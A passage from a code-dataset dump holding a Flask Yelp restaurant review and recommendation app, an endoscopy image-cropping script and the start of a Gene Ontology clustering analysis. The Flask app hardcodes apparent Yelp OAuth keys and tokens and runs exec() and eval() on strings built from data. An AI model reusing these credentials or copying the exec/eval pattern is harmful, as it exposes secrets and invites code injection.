len(frequency_list)>20:\r\n\t\t\t\tfrequency_list=frequency_list[0:20]\r\n\t\t\tglobal label_food\r\n\t\t\tnum_food=list(frequency_list[1])\r\n\t\t\tlabel_food=list(frequency_list[0])\r\n\t\t\tfig=plt.bar(range(len(num_food)),num_food)\r\n\t\t\tplt.xticks(range(len(num_food)), label_food)\r\n\t\t\tplt.xticks(rotation=30,fontsize=10)\r\n\t\t\tplt.savefig('static/review_distribution.png')\r\n\r\n\r\n\r\n\t\t\treturn render_template('reviewoutput.html', data=menu_list.to_html(),keyword=keyword,ave_rate=ave_star,std_rate=std_star,\r\n\t\t\t\tlink=get_review_links(keyword), mapfile = 'reviewmap.html')\r\n\r\n\t\telse:\r\n\t\t\treturn 'We cannot find restaurant:%s' %keyword\r\n\r\n\treturn render_template('reviewparams.html', form=form)\r\n\r\n\r\n\r\n@app.route(\"/review/feature/\", methods=['GET','POST'])\r\ndef review_feature():\r\n\r\n\t# feature-block-1 concordance_function\r\n\tdef concordance(text,word,width):\r\n\t\tlocs = [loc for loc, x in enumerate(text) if x.lower() == word.lower()]\r\n\t\tfragments = list()\r\n\t\tfor loc in locs:\r\n\t\t\tstart = max(0,loc-width)\r\n\t\t\tend = min(len(text),loc+width)\r\n\t\t\tfragments.append(' '.join(text[start:end]))\r\n\t\treturn fragments\r\n\r\n\t# feature-block-2 get_concordance_sentiment_function\r\n\tdef get_concordance_sentiment(text,word,width):\r\n\t\tif len(str(nearby_content))<20:\r\n\t\t\treturn 0\r\n\t\tsentences = concordance(text,word,width)\r\n\t\tpos=0\r\n\t\tneg=0\r\n\t\tfor sent in sentences:\r\n\t\t\tfor word in sent.split():\r\n\t\t\t\tif word in positive_words:\r\n\t\t\t\t\tpos+=1\r\n\t\t\t\tif word in negative_words:\r\n\t\t\t\t\tneg+=1\r\n\t\tif not pos and not neg:\r\n\t\t\treturn 1\r\n\t\tif pos and not neg:\r\n\t\t\treturn 10\r\n\t\telse:\r\n\t\t\treturn pos/neg\r\n\r\n\r\n\t# review-block-3: get_words_function\r\n\tdef get_words(url):\r\n\t\twords = requests.get(url).content.decode('latin-1')\r\n\t\tword_list = words.split('\\n')\r\n\t\tindex = 0\r\n\t\twhile index < len(word_list):\r\n\t\t\tword = word_list[index]\r\n\t\t\tif ';' in word or not word:\r\n\t\t\t\tword_list.pop(index)\r\n\t\t\telse:\r\n\t\t\t\tindex+=1\r\n\t\treturn word_list\r\n\tp_url = 'http://ptrckprry.com/course/ssd/data/positive-words.txt'\r\n\tn_url = 'http://ptrckprry.com/course/ssd/data/negative-words.txt'\r\n\tpositive_words = get_words(p_url)\r\n\tnegative_words = get_words(n_url)\r\n\r\n\t# feature-block-4: main\r\n\tglobal text\r\n\tglobal label_food\r\n\tform = featureForm()\r\n\r\n\tif form.validate_on_submit():\r\n\r\n\t\tvalue1=form.box1.data\r\n\t\tvalue2=form.box2.data\r\n\t\tvalue3=form.box3.data\r\n\t\tvalue4=form.box4.data\r\n\t\tvalue5=form.box5.data\r\n\t\tvalue6=form.box6.data\r\n\t\tvalue7=form.box7.data\r\n\t\tvalue8=form.box8.data\r\n\t\tvalue9=form.box9.data\r\n\t\tvalue10=form.box10.data\r\n\t\tvalue11=form.box11.data\r\n\t\tvalue12=form.box12.data\r\n\t\tvalue13=form.box13.data\r\n\t\tvalue14=form.box14.data\r\n\t\tvalue15=form.box15.data\r\n\t\tvalue16=form.box16.data\r\n\t\tvalue17=form.box17.data\r\n\t\tvalue18=form.box18.data\r\n\t\tvalue19=form.box19.data\r\n\t\tvalue20=form.box20.data\r\n\t\tvalue_all=form.box_all.data\r\n\t\tlogic_array=[value1,value2,value3,value4,value5,value6,value7,value8,\\\r\n\t\tvalue9,value10,value11,value12,value13,value14,value15,value16,\\\r\n\t\tvalue17,value18,value19,value20]\r\n\t\tif value_all==True:\r\n\t\t\tlogic_array=[True for _ in range(0,20)]\r\n\t\tmylabel=pd.DataFrame(label_food)\r\n\t\tfeature_list=list(mylabel[logic_array][0])\r\n\r\n\r\n\t\tglobal rates\r\n\t\tglobal rates_name_str\r\n\t\tglobal nearby\r\n\t\trates=list()\r\n\t\trates_name_str='['\r\n\t\ttext_content=nltk.Text(text.split())\r\n\t\tmatplotlib.style.use('seaborn-colorblind')\r\n\r\n\t\tif len(feature_list)<4:\r\n\t\t\tCOL_NUM=len(feature_list)\r\n\t\t\tROW_NUM=1\r\n\t\telse:\r\n\t\t\tCOL_NUM=4\r\n\t\t\tif len(feature_list)%COL_NUM!=0:\r\n\t\t\t\tROW_NUM=len(feature_list)//COL_NUM+1\r\n\t\t\telse:\r\n\t\t\t\tROW_NUM=len(feature_list)//COL_NUM\r\n\r\n\t\tfig, axes = plt.subplots(ROW_NUM, COL_NUM, figsize=(12,12))\r\n\r\n\t\tfor i in range(0,COL_NUM*ROW_NUM):\r\n\t\t\tif i < len(feature_list):\r\n\t\t\t\texec('global feature'+str(i+1)+'\\n'+'feature'+str(i+1)+'=feature_list['+str(i)+']')\r\n\t\t\t\texec('global nearby\\nnearby=str(concordance(text_content,feature'+str(i+1)+',10))')\r\n\t\t\t\texec('global nearby_content\\nnearby_content=nltk.Text(nearby.split())')\r\n\t\t\t\texec('global rates\\nrates.append(get_concordance_sentiment(nearby_content,feature'+str(i+1)+',10))')\r\n\t\t\t\trates_name_str+='feature'+str(i+1)+','\r\n\r\n\t\t\tif len(feature_list)>1:\r\n\t\t\t\tif len(feature_list)>4:\r\n\t\t\t\t\tax = axes[i//COL_NUM, i%COL_NUM]\r\n\t\t\t\telse:\r\n\t\t\t\t\tax = axes[i%COL_NUM]\r\n\t\t\t\tif i1:\r\n\t\t\tfig.savefig('static/many_wordcloud.png')\r\n\t\trates_name_str+=']'\r\n\r\n\r\n\t\tax=pd.DataFrame({'rating':rates}).plot(kind='bar',fontsize=15,figsize=(15,5))\r\n\t\tax.set_xticklabels(eval(rates_name_str),fontsize=11,rotation=20)\r\n\t\tfig=ax.get_figure()\r\n\t\tfig.suptitle('Scores of Selected Food', fontsize=35)\r\n\t\tfig.savefig('static/feature_rating.png')\r\n\r\n\t\treturn render_template('featureoutput.html')\r\n\treturn render_template('featureparams.html', form=form, label_food=label_food)\r\n\r\n\r\n\r\n@app.route(\"/recommend0/\", methods=['GET','POST'])\r\ndef recommend0():\r\n\treturn render_template('recommend0.html', link=get_recommend1_links())\r\n\r\n@app.route('/recommend0/recommend1/',methods=['GET','POST'])\r\ndef recommend1():\r\n\tform = recommendForm1()\r\n\r\n\tuser[\"yelping_since\"]=pd.to_datetime(user[\"yelping_since\"])\r\n\treview[\"review_len\"] = [len(t) for t in review[\"text\"]]\r\n\r\n\tb_r=pd.merge(business, review, on='business_id',how='inner')\r\n\tb_r_u=pd.merge(b_r, user, on='user_id',how='inner')\r\n\tb_r_u1 = b_r_u[b_r_u['review_count_x'] >= 10]\r\n\tuser0 = b_r_u1[['user_id', 'business_id', 'name_x', 'stars_x', 'review_count_x', 'attributes.Ambience.touristy', 'attributes.Ambience.intimate', \\\r\n 'attributes.Ambience.casual', 'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'categories', \\\r\n 'attributes.Good For.breakfast', 'attributes.Good For.lunch', 'attributes.Good For.dinner', 'attributes.Good For.latenight', \\\r\n 'attributes.Attire', 'attributes.Price Range', 'stars_y', 'latitude', 'longitude', 'votes.cool_y', 'votes.funny_y', 'votes.useful_y']]\r\n\tuser1 = user0[user0['stars_y'] == 5]\r\n\tuser2 = user1[user1['votes.cool_y'] >= 1]\r\n\tuser3 = user2[user2['votes.funny_y'] >= 1]\r\n\tuser4 = user3[user3['votes.useful_y'] >= 10]\r\n\tuser4.reset_index().drop('index', 1)\r\n\tuser4['coolratio'] = user4['votes.cool_y']/(user4['votes.cool_y'] + user4['votes.funny_y'])\r\n\tuser5 = user4[['coolratio']]\r\n\tkmeans = KMeans(n_clusters=5, random_state=0).fit(user5)\r\n\tuser4['labels'] = kmeans.labels_\r\n\r\n\tcluster0 = user4[user4['labels'] == 0][['user_id', 'business_id', 'name_x', 'stars_x', 'review_count_x', 'attributes.Ambience.touristy', 'attributes.Ambience.intimate', \\\r\n 'attributes.Ambience.casual', 'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'categories', \\\r\n 'attributes.Good For.breakfast', 'attributes.Good For.lunch', 'attributes.Good For.dinner', 'attributes.Good For.latenight', \\\r\n 'attributes.Attire', 'attributes.Price Range', 'latitude', 'longitude']]\r\n\tcluster0 = cluster0.drop_duplicates()\r\n\tcluster0 = cluster0\r\n\r\n\tcluster1 = user4[user4['labels'] == 1][['user_id', 'business_id', 'name_x', 'stars_x', 'review_count_x', 'attributes.Ambience.touristy', 'attributes.Ambience.intimate', \\\r\n 'attributes.Ambience.casual', 'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'categories', \\\r\n 'attributes.Good For.breakfast', 'attributes.Good For.lunch', 'attributes.Good For.dinner', 'attributes.Good For.latenight', \\\r\n 'attributes.Attire', 'attributes.Price Range', 'latitude', 'longitude']]\r\n\tcluster1 = cluster1.drop_duplicates()\r\n\r\n\tcluster2 = user4[user4['labels'] == 2][['user_id', 'business_id', 'name_x', 'stars_x', 'review_count_x', 'attributes.Ambience.touristy', 'attributes.Ambience.intimate', \\\r\n 'attributes.Ambience.casual', 'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'categories', \\\r\n 'attributes.Good For.breakfast', 'attributes.Good For.lunch', 'attributes.Good For.dinner', 'attributes.Good For.latenight', \\\r\n 'attributes.Attire', 'attributes.Price Range', 'latitude', 'longitude']]\r\n\tcluster2 = cluster2.drop_duplicates()\r\n\r\n\tcluster3 = user4[user4['labels'] == 3][['user_id', 'business_id', 'name_x', 'stars_x', 'review_count_x', 'attributes.Ambience.touristy', 'attributes.Ambience.intimate', \\\r\n 'attributes.Ambience.casual', 'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'categories', \\\r\n 'attributes.Good For.breakfast', 'attributes.Good For.lunch', 'attributes.Good For.dinner', 'attributes.Good For.latenight', \\\r\n 'attributes.Attire', 'attributes.Price Range', 'latitude', 'longitude']]\r\n\tcluster3 = cluster3.drop_duplicates()\r\n\r\n\tcluster4 = user4[user4['labels'] == 4][['user_id', 'business_id', 'name_x', 'stars_x', 'review_count_x', 'attributes.Ambience.touristy', 'attributes.Ambience.intimate', \\\r\n 'attributes.Ambience.casual', 'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'categories', \\\r\n 'attributes.Good For.breakfast', 'attributes.Good For.lunch', 'attributes.Good For.dinner', 'attributes.Good For.latenight', \\\r\n 'attributes.Attire', 'attributes.Price Range', 'latitude', 'longitude']]\r\n\tcluster4 = cluster4.drop_duplicates()\r\n\r\n\tdef recommend1_1(cool,funny):\r\n\r\n\t\tif funny == 'f1':\r\n\t\t\tfunnynum = 1\r\n\t\tif funny == 'f2':\r\n\t\t\tfunnynum = 2\r\n\t\tif funny == 'f3':\r\n\t\t\tfunnynum = 3\r\n\t\tif funny == 'f4':\r\n\t\t\tfunnynum = 4\r\n\t\tif funny == 'f5':\r\n\t\t\tfunnynum = 5\r\n\r\n\t\tif cool == 'c1':\r\n\t\t\tcoolnum = 1\r\n\t\tif cool == 'c2':\r\n\t\t\tcoolnum = 2\r\n\t\tif cool == 'c3':\r\n\t\t\tcoolnum = 3\r\n\t\tif cool == 'c4':\r\n\t\t\tcoolnum = 4\r\n\t\tif cool == 'c5':\r\n\t\t\tcoolnum = 5\r\n\r\n\t\tratio = coolnum/(funnynum+coolnum)\r\n\t\tmycluster = kmeans.predict(ratio)[0]\r\n\t\tif mycluster == 0:\r\n\t\t\tresult = cluster0\r\n\t\tif mycluster == 1:\r\n\t\t\tresult = cluster1\r\n\t\tif mycluster == 2:\r\n\t\t\tresult = cluster2\r\n\t\tif mycluster == 3:\r\n\t\t\tresult = cluster3\r\n\t\tif mycluster == 4:\r\n\t\t\tresult = cluster4\r\n\t\t\r\n\t\treturn result\r\n\r\n\r\n\tif form.validate_on_submit():\r\n\t\tfunny = request.form.get('funny')\r\n\t\tcool = request.form.get('cool')\r\n\r\n\t\tglobal recommend_1\r\n\t\trecommend_1 = recommend1_1(cool, funny)\r\n\t\t\r\n\t\treturn redirect(url_for('recommend2'))\r\n\r\n\treturn render_template('recommend1.html', form=form)\r\n\r\n@app.route('/recommend0/recommend1/recommend2/',methods=['GET','POST'])\r\ndef recommend2():\r\n\r\n\tform = recommendForm2()\r\n\r\n\tglobal recommend_1\r\n\r\n\tdef recommend2_1(category, time, purpose):\r\n\t\tbusiness = recommend_1[recommend_1['categories'].str.contains(category, case = False)]\r\n\r\n\t\tif time == 't1':\r\n\t\t\tbusiness1 = business[business['attributes.Good For.breakfast'] == True]\r\n\t\tif time == 't2':\r\n\t\t\tbusiness1 = business[business['attributes.Good For.lunch'] == True]\r\n\t\tif time == 't3':\r\n\t\t\tbusiness1 = business[business['attributes.Good For.dinner'] == True]\r\n\t\tif time == 't4':\r\n\t\t\tbusiness1 = business[business['attributes.Good For.latenight'] == True]\r\n\t\tif time == 't5':\r\n\t\t\tbusiness1 = business\r\n\r\n\t\tintimate = business1[business1['attributes.Ambience.intimate'] == True]\r\n\t\ttouristy = business1[business1['attributes.Ambience.touristy'] == True]\r\n\t\tcasual = business1[business1['attributes.Ambience.casual'] == True]\r\n\t\tromantic = business1[business1['attributes.Ambience.romantic'] == True]\r\n\t\tupscale = business1[business1['attributes.Ambience.upscale'] == True]\r\n\r\n\t\tif purpose == \"p1\":\r\n\t\t\tbusiness2 = pd.concat([intimate, romantic])\r\n\t\tif purpose == \"p2\":\r\n\t\t\tbusiness2 = pd.concat([intimate, upscale])\r\n\t\tif purpose == \"p3\":\r\n\t\t\tbusiness2 = pd.concat([intimate, casual])\r\n\t\tif purpose == \"p4\":\r\n\t\t\tbusiness2 = pd.concat([intimate, casual])\r\n\t\tif purpose == \"p5\":\r\n\t\t\tbusiness2 = pd.concat([intimate, casual, upscale])\r\n\t\tif purpose == \"p6\":\r\n\t\t\tbusiness2 = pd.concat([casual, touristy])\r\n\r\n\t\treturn business2.drop('user_id', 1).drop_duplicates()\r\n\t\r\n\tif form.validate_on_submit():\r\n\t\tcategory = request.form.get('category')\r\n\t\ttime = request.form.get('time')\r\n\t\tpurpose = request.form.get('purpose')\r\n\t\tglobal recommend_2\r\n\t\trecommend_2 = recommend2_1(category, time, purpose)\r\n\t\trecommend_2 = recommend_2.reset_index().drop('index', 1)\r\n\t\tif len(recommend_2) == 0:\r\n\t\t\treturn render_template('recommend2r-1.html', form=form)\r\n\t\telse:\r\n\t\t\treturn redirect(url_for('recommend3'))\r\n\r\n\treturn render_template('recommend2.html', form=form)\r\n\r\n@app.route('/recommend0/recommend1/recommend2/recommend3/',methods=['GET','POST'])\r\ndef recommend3():\r\n\t\r\n\tform = recommendForm3()\r\n\r\n\trestaurant_pic1 = ['cheap1.jpg', 'business2.jpg', 'romantic1.jpg','cheap2.jpg']\r\n\trestaurant_pic2 = ['tourist1.jpg', 'tourist2.jpg', 'romantic2.jpg', 'business1.jpg']\r\n\r\n\tglobal recommend_2\r\n\r\n\tmyframe = recommend_2[['attributes.Ambience.touristy', 'attributes.Ambience.intimate', 'attributes.Ambience.casual', \\\r\n\t\t\t\t\t\t'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'attributes.Price Range', 'attributes.Attire']]\r\n\tmyframe[['attributes.Ambience.touristy', 'attributes.Ambience.intimate', 'attributes.Ambience.casual', 'attributes.Ambience.romantic', \\\r\n \t'attributes.Ambience.upscale']] = myframe[['attributes.Ambience.touristy', 'attributes.Ambience.intimate', 'attributes.Ambience.casual', \\\r\n 'attributes.Ambience.romantic', 'attributes.Ambience.upscale']].astype(int)\r\n\tmyframe = myframe.replace(to_replace=['casual', 'formal', 'dressy'], value=[0, 1, 0.8])\r\n\t#myframe1 = np.array(myframe)\r\n\tmyframe1 = preprocessing.scale(myframe)\r\n\t#myframe\r\n\t\r\n\tfea_matrix = np.array([[0.1,0.3,0.8,0.6,0,1,0],[0.1,0.5,0.1,0.4,0.9,4,0.8],[0.1,0.6,0.5,0.9,0.7,4,0.7],[0.6,0.1,1,0,0,1,0],[0.8,0.1,0.9,0.1,0.2,1,0],[0.9,0.5,0.7,0.2,0.4,3,0.1],[0.8,0.8,0.5,1,0.8,4,0.6],[0.1,1,0,0.3,1,4,1]])\r\n\tfea_matrix = preprocessing.scale(fea_matrix)\r\n\r\n\tdef recommend3_1(pic_choice):\r\n\t\tif pic_choice == \"p1\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[0]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p2\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[1]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p3\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[2]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p4\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[3]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p5\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[4]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p6\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[5]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p7\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[6]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p8\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[7]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tdistances, indices = nbrs.kneighbors(X)\r\n\t\tmyindex = np.delete(indices[-1], 0)\r\n\t\trecommend_3 = recommend_2[['business_id', 'name_x', 'stars_x', 'review_count_x', 'latitude', 'longitude']].ix[myindex]\r\n\t\treturn recommend_3\r\n\r\n\tif form.validate_on_submit():\r\n\t\tpic_choice = request.form.get('pic_choice')\r\n\t\tglobal recommend_3\r\n\t\tif len(recommend_2) <= 5:\r\n\t\t\trecommend_3 = recommend_2[['business_id', 'name_x', 'stars_x', 'review_count_x', 'latitude', 'longitude']]\r\n\t\telse:\r\n\t\t\trecommend_3 = recommend3_1(pic_choice)\r\n\r\n\t\tresult = recommend_3.sort_values('review_count_x', ascending = False).head(1)\r\n\r\n\t\tlat = float(result[\"latitude\"])\r\n\t\tlnt = float(result[\"longitude\"])\r\n\r\n\t\t#name=str(result[\"name_x\"])[0]\r\n\t\tname = list(result[\"name_x\"])[0]\r\n\r\n\t\tfrom yelp.client import Client\r\n\t\tfrom yelp.oauth1_authenticator import Oauth1Authenticator\r\n\r\n\t\tauth = Oauth1Authenticator(\r\n \t\tconsumer_key='dr8aE-pryV4EwOTn1AOrgQ',\r\n \t\tconsumer_secret='Vppa6lir0US1wr76S-qkilN-Bgk',\r\n \t\ttoken='oFoNB1dOAUd5gt1lKqYhTM3NYp5VDXX1',\r\n \t\ttoken_secret='GQEAGbEaNpk50C6_92MyzomHF5o'\r\n\t\t\t)\r\n\r\n\t\tclient = Client(auth)\r\n\r\n\t\tparams = {\"sort\": 0, 'radius_filter': 100}\r\n\r\n\t\tthis_count = 0\r\n\r\n\r\n\t\tresponse = client.search_by_coordinates(lat, lnt, **params)\r\n\t\tbusiness_list = response.businesses\r\n\t\tfor this_bus in business_list:\r\n\t\t\tif this_bus.name == name:\r\n\t\t\t\tmyurl = this_bus.url\r\n\t\t\t\tthis_count = 1\r\n\t\t\t\tbreak\r\n\r\n\t\t#this_count = 0\t\t\t\r\n\t\t \r\n\t\t#myurl = response.businesses[0].url\r\n\r\n\t\tif this_count == 1:\r\n\t\t\treturn redirect(myurl)\r\n\t\telse:\r\n\t\t\tlat = list(result[\"latitude\"])\r\n\t\t\tlnt = list(result[\"longitude\"])\r\n\t\t\tgmap = gmplot.GoogleMapPlotter(np.mean(lat),np.mean(lnt),12)\r\n\t\t\tgmap.scatter(lat, lnt, '#3B0B39', size=200, marker=False)\r\n\t\t\tgmap.draw(\"templates/reviewmap.html\")\r\n\r\n\t\t\treturn render_template('recommendoutput.html', data=result.to_html(), mapfile = 'reviewmap.html', name=list(result[\"name_x\"])[0], \r\n\t\t\t\tstars=list(result[\"stars_x\"])[0], reviewcount=int(list(result[\"review_count_x\"])[0])) \r\n\treturn render_template('recommend3.html', form=form, pics=list(form.pic_choice), labels1=restaurant_pic1, labels2=restaurant_pic2)\r\n\r\nif __name__ == '__main__':\r\n\tapp.run(debug = True)","sub_path":"Yelp_flask.py","file_name":"Yelp_flask.py","file_ext":"py","file_size_in_byte":37927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"255538370","text":"#!/usr/bin/env python3\n# filename: img_cropper.py\n\nfrom PIL import Image, ImageOps\nimport os\n\ndef crop_pil_img(pil_img):\n border = (32, 32, 32, 32) # left, top, right, bottom\n cropped_pil_img = ImageOps.crop(pil_img, border)\n return cropped_pil_img\n\ndef crop_n_save_img(img_filepath,cropped_filepath):\n pil_img = Image.open(img_filepath, 'r')\n cropped_pil_img = crop_pil_img(pil_img)\n cropped_pil_img.save(cropped_filepath)\n\n#def crop_n_save_all_imgs_in_folder(folder_path):\n# In general, need to have a robust naming system across many folders.\n# crop_n_save_img()\n\n\nsrc_path_base = '../../input-data/1-pre-processed/B/'\ndst_path_base = '../../input-data/2-processed/B/'\ni = 0\nfor dirPath, subDirs, files in os.walk(src_path_base+'Normal/'):\n for file in files:\n if file.endswith(\".jpg\"):\n i += 1\n crop_n_save_img( os.path.join(dirPath, file) ,\n dst_path_base+f'Normal/{i:02d}.jpg' )\ni = 0\nfor dirPath, subDirs, files in os.walk(src_path_base+'Abnormal/'):\n for file in files:\n if file.endswith(\".jpg\"):\n i += 1\n crop_n_save_img( os.path.join(dirPath, file) ,\n dst_path_base+f'Abnormal/{i:02d}.jpg' )\n\n","sub_path":"ai_vision_for_endoscopy/img-processing/img_cropper_old2.py","file_name":"img_cropper_old2.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"228969078","text":"\n# RA, 2018-01-15\n\n## ================== IMPORTS :\n\nimport re\nimport os\nimport sys\nimport math\nimport pickle\nimport random\nimport inspect\nimport numpy as np\nimport networkx as nx\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfrom scipy.sparse import lil_matrix\nfrom collections import defaultdict\nfrom string import ascii_lowercase\nfrom numpy.matlib import repmat\nfrom scipy import stats\nfrom scipy.constants import golden as phi\nfrom itertools import chain\nfrom multiprocessing import cpu_count\nfrom joblib import Parallel, delayed\nfrom progressbar import ProgressBar as Progress\n\n# http://scikit-learn.org/stable/modules/generated/sklearn.manifold.TSNE.html\nfrom sklearn.manifold import TSNE\n\n# https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html\nfrom scipy.cluster.hierarchy import linkage\n# https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.leaves_list.html\nfrom scipy.cluster.hierarchy import leaves_list\n\nfrom sklearn.metrics.pairwise import euclidean_distances as euc_dist\n\n# \nfrom networkx.drawing.nx_agraph import graphviz_layout\n\n## ==================== INPUT :\n\nIFILE = {\n\t'BC data' : \"OUTPUT/0_select/UV/GSE75688_GEO_processed_Breast_Cancer_raw_TPM_matrix.txt-selected.pkl\",\n\t'GO graph' : \"OUTPUT/0_go-graph/UV/go-graph.pkl\",\n\t'GO=>CI' : \"OUTPUT/0_go2ci/UV/go2ci.pkl\",\n\t\n\t'tsne runs' : \"OUTPUT/C_goordinates/tsne_runs.pkl\",\n\t'classified' : \"OUTPUT/D_classifier-nn/classified_epochs=9000.pkl\",\n}\n\n# Check existence of input files\nfor f in IFILE.values() :\n\tassert(os.path.isfile(f)), \"File {} not found.\".format(f)\n\n## =================== OUTPUT :\n\nOFILE = {\n\t\n\t'tsne' : \"OUTPUT/C_goordinates-D/tsne_dim={dim}_run={run}_sub={sub}.{ext}\",\n\t'tsne info' : \"OUTPUT/C_goordinates-D/tsne_dim={dim}.txt\",\n}\n\n# Create output directories\nfor f in OFILE.values() :\n\tos.makedirs(os.path.dirname(f), exist_ok=True)\n\n## ==================== PARAM :\n\nPARAM = {\n\t# Figure formats\n\t'ext' : ['png', 'pdf'],\n\t\n\t# Number of parallel computing processes\n\t'#proc' : min(12, math.ceil(cpu_count() / 1.2)),\n}\n\nmpl.rcParams['axes.labelsize'] = 'large'\n\n## ====================== AUX :\n\n# Abbreviate a GO term t, truncating it to max_len characters\ndef abbr(t, max_len) :\n\tD = { \n\t\t\"replication\" : \"repl\",\n\t\t\"involved in\" : \"in\",\n\t\t\"regulation\" : \"regu\",\n\t\t\"synthesis\" : \"syn\",\n\t\t\"negative\" : \"neg\",\n\t\t\"positive\" : \"pos\",\n\t\t\"double\" : \"dbl\",\n\t\t\"single\" : \"sgl\",\n\t\t\"error\" : \"err\",\n\t}\n\t\n\tfor pair in D.items() : t = t.replace(*pair)\n\n\tif (len(t) > max_len) : t = t[0:(max_len-3)] + \"...\"\n\t\n\treturn t\n\n# This script\nTHIS = inspect.getsource(inspect.getmodule(inspect.currentframe()))\n\n## ====================== (!) :\n\ndef goordinate_trafo(GO_I, n_genes) :\n\tassert(type(GO_I) is list)\n\t\n\tT = lil_matrix((len(GO_I), n_genes))\n\t\n\tfor (n, (go, I)) in enumerate(GO_I) : \n\t\tT[n, I] = 1\n\t\n\treturn T\n\n\n# https://en.wikipedia.org/wiki/Silhouette_(clustering)\n# D = distance matrix\n# S = [[indices of cluster c] for each cluster c]\n# Returns the silhouette values by cluster\ndef silhouette(D, S) :\n\tassert(D.shape[0] == D.shape[1])\n\tdef md(i, c) : return np.mean([D[i, j] for j in c])\n\tA = { c : [md(i, c) for i in c] for c in S }\n\tB = { c : [min(md(i, d) for d in S if (d != c)) for i in c] for c in S }\n\ts = { c : [(b - a) / max(b, a) for (a, b) in zip(A[c], B[c]) if max(b, a)] for c in S }\n\t#for s in s.values() : print(sorted(s))\n\treturn s\n\n# Compute a distance matrix as (1 - cos(angle))\ndef cos_dist(X) :\n\t# Covariance & norm products\n\tC = np.tensordot(X, X, axes=([1], [1]))\n\tV = np.sqrt(np.outer(np.diag(C), np.diag(C)))\n\tV[V == 0] = 1\n\tD = 1 - (C / V)\n\treturn D\n\n# Clustering index\ndef CI(X, feature_axis) :\n\n\tdef dist(X) : return cos_dist(np.moveaxis(X, feature_axis, 1))\n\t#def dist(X) : return euc_dist(np.moveaxis(X, feature_axis, 1))\n\n\treturn np.mean([\n\t\tnp.sign(x) \n\t\tfor x in chain.from_iterable(silhouette(dist(X), S).values())\n\t])\n\n## ===================== DATA :\n\n#[ BC DATA ]#\n\n# Load the BC data\nBC_data = pickle.load(open(IFILE['BC data'], 'rb'))\n\n# Expression matrix\nX = BC_data['X']\n\n# Rearrange data axes\n(axis_gene, axis_smpl) = (0, 1)\nX = np.moveaxis(X, BC_data['axis_gene'], axis_gene)\n\n# Number of samples / genes in the expression matrix\n(n_samples, n_genes) = (X.shape[axis_smpl], X.shape[axis_gene])\n\n# ENSG IDs\nBC_E = BC_data['gene_id']\nassert(len(BC_E) == X.shape[axis_gene]), \"Inconsistent gene info\"\n\n# E2I : BC ENSG --> Gene indices in BC data\nE2I = dict(zip(BC_E, range(len(BC_E))))\n\n# Clusters/groups\nG2S = { \n\tg : tuple(s for (s, h) in SH)\n\tfor (g, SH) in BC_data['B2SH'].items() \n}\nS = sorted(G2S.values())\n\n#[ GO DATA ]#\n\n# Clustering indices data bundle\nCI_data = pickle.load(open(IFILE['GO=>CI'], 'rb'))\n\n# GO2E : GO ID --> Clustering index\nGO2CI = CI_data['GO2CI']\n\n# GO2E : GO ID --> [ENSG IDs]\nGO2E = CI_data['GO2E']\n\n# GO2I : GO ID --> Gene indices in BC data\nGO2I = {\n\tgo : np.asarray([E2I[e] for e in E])\n\tfor (go, E) in GO2E.items()\n}\n\n# GO2T : GO ID --> GO category name\nGO2T = CI_data['GO2T']\n\n# GO2WQ : GO ID --> clustering index windowed quantile\nGO2WQ = CI_data['GO2WQ']\n\n\n## The Gene Ontology graph\n#GO_graph = pickle.load(open(IFILE['GO graph'], 'rb'))\n\n## Are those GO IDs in the GO graph?\n#go_not_in_graph = set(GO2E.keys()) - set(GO_graph.nodes())\n#print(\"Note: {} GO IDs are not in the graph\".format(len(go_not_in_graph)))\n\n\n## =============== PREPROCESS :\n\n#[ Remove repeated GO categories ]#\n\nH2GO = defaultdict(set)\nfor (go, E) in GO2E.items() : H2GO[hash('+'.join(sorted(E)))].add(go)\nH2GO = dict(H2GO)\n#\n# Check for no hash collisions\nassert(all((1 == len(set('+'.join(sorted(GO2E[go])) for go in GO))) for GO in H2GO.values()))\n#\n# Non-redundant GO categories and their aliases\nGO2A = { min(GO) : sorted(GO) for GO in H2GO.values() }\n#\n#print(\"{} of {} GO categories are non-redundant\".format(len(GO2A), len(GO2E)))\nassert(10000 <= len(GO2A) <= 30000), \"Unexpected number of GO terms\"\n#\ndel H2GO\n\ndef restrict(GO2X, GO) :\n\treturn { go : x 